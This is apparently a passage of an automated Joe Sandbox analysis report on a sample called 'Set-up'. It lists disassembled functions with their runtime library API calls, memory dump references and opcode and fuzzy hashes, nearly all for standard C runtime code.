                                                                                              Function 6BB64F99 Relevance: 15.2, APIs: 10, Instructions: 194COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000100,00000001,00000000,?,?,?,?,?,?,?), ref: 6BB64FE8
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6BB6504B
                                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 6BB65067
                                                                                              • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 6BB650D1
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6BB650F0
                                                                                              • _freea_s.MSVCR100(00000000), ref: 6BB650FA
                                                                                              • _freea_s.MSVCR100(?), ref: 6BB65103
                                                                                              • malloc.MSVCR100(00000008), ref: 6BB90D21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$String_freea_s$malloc
                                                                                              • String ID:
                                                                                              • API String ID: 1406006131-0
                                                                                              • Opcode ID: edf1a43f88479c74fab4b35de8ddbf58f5152848d95372eb901b4d094ed68de4
                                                                                              • Instruction ID: 09cfa2e6c014c1716e58149110def882969528df945596686c86edfb136e9bcc
                                                                                              • Opcode Fuzzy Hash: edf1a43f88479c74fab4b35de8ddbf58f5152848d95372eb901b4d094ed68de4
                                                                                              • Instruction Fuzzy Hash: 0551B07290018EBFDF018FA4CCA18AE7BB6EF49394F504469F62496111E739CD60DBA4
                                                                                              Function 6BBA0CF5 Relevance: 15.2, APIs: 10, Instructions: 153COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA0CFC
                                                                                              • EnterCriticalSection.KERNEL32(?,00000010,6BB98C33,00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000), ref: 6BBA0D11
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000000C), ref: 6BBA0D51
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000120), ref: 6BBA0DA4
                                                                                              • _memset.LIBCMT(00000000,00000000,00000120), ref: 6BBA0DB6
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BBA0DDB
                                                                                              • _memset.LIBCMT(00000020,00000000,00000100), ref: 6BBA0DEF
                                                                                              • SetEvent.KERNEL32(?), ref: 6BBA0E96
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BBA0EA3
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6BBA0EC7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@CriticalEventSection_memset$CloseCreateEnterH_prolog3HandleLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3129499143-0
                                                                                              • Opcode ID: af4ab94ad1ed1f650ab9a9cf020017ad5d7951d3a29a08950aabb1fd5d5969bb
                                                                                              • Instruction ID: b40f29f8611f75dd35c3893806f2e73f2d01ed30d38709bb4dd1ff8a7ace2549
                                                                                              • Opcode Fuzzy Hash: af4ab94ad1ed1f650ab9a9cf020017ad5d7951d3a29a08950aabb1fd5d5969bb
                                                                                              • Instruction Fuzzy Hash: 75518A71E057429FD724CF28C485BAABBF4FF09714F0084A9E89ADB650E778E950CB90
                                                                                              Function 6BB70E33 Relevance: 15.1, APIs: 10, Instructions: 124COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(00000080,00000000,6BC035D0,00000001,?,?,00000000,?,?,?,?,6BC035D0,?), ref: 6BB70E8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 626452242-0
                                                                                              • Opcode ID: 67c3e6cf202be5eacefdbbcc078799246fa8f088fa611e438c400548b29ef971
                                                                                              • Instruction ID: 044dacc291e8982a3aeb4f938125ea72ccaeeb7e513516b161206c4411eae244
                                                                                              • Opcode Fuzzy Hash: 67c3e6cf202be5eacefdbbcc078799246fa8f088fa611e438c400548b29ef971
                                                                                              • Instruction Fuzzy Hash: 084106729002D6EFDB21AF68C8D0DAD3BB5EF42314B4001AAE5305B2D0D7398D81CF92
                                                                                              Function 6BBA8FD6 Relevance: 15.1, APIs: 10, Instructions: 89COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA8FDD
                                                                                                • Part of subcall function 6BBA245A: __EH_prolog3.LIBCMT ref: 6BBA2461
                                                                                                • Part of subcall function 6BBA245A: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6BB9D96F,00000000,?,00000000,00000000), ref: 6BBA248C
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6BBA24E7
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6BBA24F6
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2505
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2514
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2523
                                                                                                • Part of subcall function 6BBA245A: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2532
                                                                                                • Part of subcall function 6BBA245A: GetCurrentThread.KERNEL32 ref: 6BBA2550
                                                                                                • Part of subcall function 6BBA245A: GetThreadPriority.KERNEL32(00000000), ref: 6BBA2557
                                                                                                • Part of subcall function 6BB9F2B7: __EH_prolog3.LIBCMT ref: 6BB9F2BE
                                                                                                • Part of subcall function 6BB9F2B7: EnterCriticalSection.KERNEL32(6BB9D93F,00000008,6BBA9035), ref: 6BB9F2D0
                                                                                                • Part of subcall function 6BB9F2B7: ??2@YAPAXI@Z.MSVCR100(00000024), ref: 6BB9F2E2
                                                                                                • Part of subcall function 6BB9F2B7: ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6BB9F307
                                                                                                • Part of subcall function 6BB9F2B7: LeaveCriticalSection.KERNEL32(?), ref: 6BB9F329
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BBA9039
                                                                                              • GetLastError.KERNEL32 ref: 6BBA9049
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBA9061
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBA906F
                                                                                              • GetLastError.KERNEL32 ref: 6BBA908C
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBA90A4
                                                                                              • GetLastError.KERNEL32 ref: 6BBA90CE
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBA90E6
                                                                                              • InitializeSListHead.KERNEL32(000000E8), ref: 6BBA90FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCriticalErrorH_prolog3LastSection$??2@InitializeThread$CountCreateCurrentEnterEventExceptionHeadLeaveListPrioritySpinThrow
                                                                                              • String ID:
                                                                                              • API String ID: 7361241-0
                                                                                              • Opcode ID: 2c86a58f509e011396a2c10944f630299d06a58fdb4911226131f7ee3dafbd38
                                                                                              • Instruction ID: 08cbbc8b566a81dc6fceaf3c2fad22afe4bfd53eaa090064cd49478c338a1197
                                                                                              • Opcode Fuzzy Hash: 2c86a58f509e011396a2c10944f630299d06a58fdb4911226131f7ee3dafbd38
                                                                                              • Instruction Fuzzy Hash: E23170728042869FCB209F74DC81BAEB7B8FF06384F10482DE566E7100DB39E509DB60
                                                                                              Function 6BBA1F26 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BBA1F2D
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000024,0000003C,6BBA1F21,?,?,?,?,?,6BBA03E2,?,00000000,6BC04628,0000000C,6BBA0342,?,?), ref: 6BBA1F36
                                                                                                • Part of subcall function 6BB602C1: malloc.MSVCR100(?), ref: 6BB602CC
                                                                                              • memcpy.MSVCR100(00000000,6BC06310,00000024,0000003C,6BBA1F21,?,?,?,?,?,6BBA03E2,?,00000000,6BC04628,0000000C,6BBA0342), ref: 6BBA1F53
                                                                                              • std::exception::exception.LIBCMT(?,?,6BC00034,?,00000002,00000001), ref: 6BBA1F86
                                                                                              • _CxxThrowException.MSVCR100(?,6BC00034,?,00000002,00000001), ref: 6BBA1F9B
                                                                                              • std::exception::exception.LIBCMT(?,6BB93A58,6BC00018,?), ref: 6BBA1FBA
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001), ref: 6BBA1FDD
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001), ref: 6BBA1FE8
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT(00000002,00000001), ref: 6BBA1FFE
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000002,00000001), ref: 6BBA201A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Policy$Concurrency::unsupported_os::unsupported_osConcurrency@@ElementKey@2@@Policy@SchedulerValue@std::exception::exception$??2@ExceptionH_prolog3_catchThrowmallocmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1209366282-0
                                                                                              • Opcode ID: a5d368ad25d0cf9b8b6885de7f8a2f0e9c77d739624a18d6c6883f17ea0685e3
                                                                                              • Instruction ID: 11059b78f0a72d427d1faf375dbd8b0c5dfde5bec579e029d81d31d7f3337de8
                                                                                              • Opcode Fuzzy Hash: a5d368ad25d0cf9b8b6885de7f8a2f0e9c77d739624a18d6c6883f17ea0685e3
                                                                                              • Instruction Fuzzy Hash: 0D31D171D081D8AFCF14EF75D892ADCB7B5EF06398F044026E505AB240EB7D9A05CBA1
                                                                                              Function 6BB7786B Relevance: 15.1, APIs: 10, Instructions: 87COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2819658684-0
                                                                                              • Opcode ID: d7431908032102f2501069090c76bcfd4018bb8676c7979756ea6e7e940e275a
                                                                                              • Instruction ID: 89ec73fd08532e25255ef6dbc768b4acbbae5abbee6b720a77ac5e2fdecb7341
                                                                                              • Opcode Fuzzy Hash: d7431908032102f2501069090c76bcfd4018bb8676c7979756ea6e7e940e275a
                                                                                              • Instruction Fuzzy Hash: 9521E5318046C5ABCF355FB6D881A6E3724EF42378B1512D8E978472A1EB7C8800CFB2
                                                                                              Function 6BB77EC4 Relevance: 15.1, APIs: 10, Instructions: 85COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _lock.MSVCR100(00000008,6BB77F98,00000018,6BBAC0CB,00000001,00000001,00000000,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9), ref: 6BB77EE6
                                                                                              • DecodePointer.KERNEL32(6BB77F98,00000018,6BBAC0CB,00000001,00000001,00000000,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F20
                                                                                              • DecodePointer.KERNEL32(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F35
                                                                                              • _encoded_null.MSVCR100(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F4C
                                                                                              • DecodePointer.KERNEL32(-00000004,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F5B
                                                                                              • _encoded_null.MSVCR100(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F5F
                                                                                              • DecodePointer.KERNEL32(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F6E
                                                                                              • DecodePointer.KERNEL32(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F78
                                                                                                • Part of subcall function 6BB77E18: GetModuleHandleW.KERNEL32(00000000,6BB77EDC,6BB77F98,00000018,6BBAC0CB,00000001,00000001,00000000,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001), ref: 6BB77E1A
                                                                                              • ___crtCorExitProcess.LIBCMT ref: 6BB87405
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: DecodePointer$_encoded_null$ExitHandleModuleProcess___crt_lock
                                                                                              • String ID:
                                                                                              • API String ID: 729311798-0
                                                                                              • Opcode ID: 5898cf09aa3af5439f4c8e4b1dfb1985d3e28a0d9de70ae0bdd12bc3927ed953
                                                                                              • Instruction ID: dc3f37f5811ef6241d22605bc5d51b33098c0fd3ca1ebed714306ddf13775fd9
                                                                                              • Opcode Fuzzy Hash: 5898cf09aa3af5439f4c8e4b1dfb1985d3e28a0d9de70ae0bdd12bc3927ed953
                                                                                              • Instruction Fuzzy Hash: 5B313E31D043C99EDF10AFB6C98129DBBF5FB29359F1140BAD424A6150EBF94A40CFA1
                                                                                              Function 6BB6FD24 Relevance: 15.1, APIs: 10, Instructions: 85COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _lock.MSVCR100(00000007,6BB6FD98,0000000C), ref: 6BB6FD32
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • _wcslen.LIBCMT(00000000,6BB6FD98,0000000C), ref: 6BB6FDB5
                                                                                              • calloc.MSVCR100(00000001,00000002,00000000,6BB6FD98,0000000C), ref: 6BB6FDC0
                                                                                              • wcscpy_s.MSVCR100(00000000,00000001,00000000), ref: 6BB6FDD7
                                                                                              • _errno.MSVCR100(6BB6FD98,0000000C), ref: 6BB908C8
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB6FD98,0000000C), ref: 6BB908D2
                                                                                              • _errno.MSVCR100 ref: 6BB908E3
                                                                                              • _errno.MSVCR100 ref: 6BB908EE
                                                                                                • Part of subcall function 6BB6FCB3: _wcslen.LIBCMT(00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FCD5
                                                                                                • Part of subcall function 6BB6FCB3: _wcslen.LIBCMT(00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FCE8
                                                                                                • Part of subcall function 6BB6FCB3: _wcsnicoll.MSVCR100(00000000,00000000,00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FD05
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_wcslen$CriticalEnterSection_invalid_parameter_noinfo_lock_wcsnicollcallocwcscpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 2000213683-0
                                                                                              • Opcode ID: 861dc683ed726b676b8ace8cfe3acddc99cffb3851ccfb14c3dd06773b626a66
                                                                                              • Instruction ID: b610b0a19d73c0567c1077eb4504bdb88c61a8a43232b60838b72305e87ca406
                                                                                              • Opcode Fuzzy Hash: 861dc683ed726b676b8ace8cfe3acddc99cffb3851ccfb14c3dd06773b626a66
                                                                                              • Instruction Fuzzy Hash: 3621B071A446E5DBCB02AF78D882A9D3771EF46B94FA18461E4249F280FB7C9D418FD0
                                                                                              Function 6BBAABC4 Relevance: 15.1, APIs: 10, Instructions: 80librarythreadCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 6BBAABDB
                                                                                              • GetModuleFileNameW.KERNEL32(6BB50000,?,00000104), ref: 6BBAABF7
                                                                                              • LoadLibraryW.KERNEL32(?), ref: 6BBAAC08
                                                                                              • GetLastError.KERNEL32 ref: 6BBAAC1F
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBAAC3A
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBAAC4B
                                                                                              • CreateThread.KERNEL32(00000000,00000000,-00000018,6BBA0ED5,00010000,?), ref: 6BBAAC8D
                                                                                              • GetLastError.KERNEL32 ref: 6BBAAC97
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBAACAF
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBAACBD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastModuleThrow$CreateFileHandleLibraryLoadNameThread
                                                                                              • String ID:
                                                                                              • API String ID: 475412-0
                                                                                              • Opcode ID: 6965747911a7608edda68c4a6ef3470df01c8c0b3b800ac7cf3d1df6a207d004
                                                                                              • Instruction ID: 416123712d450963a67b1acd92a6971fcfca8b796bf54f79988fb7eadc54cd98
                                                                                              • Opcode Fuzzy Hash: 6965747911a7608edda68c4a6ef3470df01c8c0b3b800ac7cf3d1df6a207d004
                                                                                              • Instruction Fuzzy Hash: 79219232A04289AFEF14AFB0CC4ABAE3778FF05344F1400B9E516D6190EB79DA449F61
                                                                                              Function 6BB62ADB Relevance: 15.1, APIs: 10, Instructions: 70memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • HeapReAlloc.KERNEL32(00000000,00000000,6BBFFC34,00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010), ref: 6BB62B14
                                                                                              • malloc.MSVCR100(6BBFFC34,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?), ref: 6BB62B90
                                                                                              • free.MSVCR100(00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57), ref: 6BB8F367
                                                                                              • _callnewh.MSVCR100(6BBFFC34,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?), ref: 6BB8F383
                                                                                              • _callnewh.MSVCR100(6BBFFC34,00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010), ref: 6BB8F394
                                                                                              • _errno.MSVCR100(00000000,00000000,?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57), ref: 6BB8F39A
                                                                                              • _errno.MSVCR100(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3AC
                                                                                              • GetLastError.KERNEL32(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3B3
                                                                                              • _errno.MSVCR100(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3C4
                                                                                              • GetLastError.KERNEL32(?,6BB62BAC,?,6BBFFC34,00000000,00000000,?,6BB9061F,00000000,00000010,?,?,?,6BB6AA57,?,6BB6AA70), ref: 6BB8F3CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$ErrorLast_callnewh$AllocHeapfreemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2627451454-0
                                                                                              • Opcode ID: 1006b4d01e6dc76d6307f727f91b63214dbfdc5e6a13243a3b0242ac514eb579
                                                                                              • Instruction ID: 1bd465ea418b5cdbb5927138ebdced948712b8d29f6feb397ede4de943d2380c
                                                                                              • Opcode Fuzzy Hash: 1006b4d01e6dc76d6307f727f91b63214dbfdc5e6a13243a3b0242ac514eb579
                                                                                              • Instruction Fuzzy Hash: F81136324056A2ABDF161F78D800BAE37A4EF467E4B184979F818CB150FF3DCC408AA0
                                                                                              Function 6BB6DEAC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 171COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator=atol
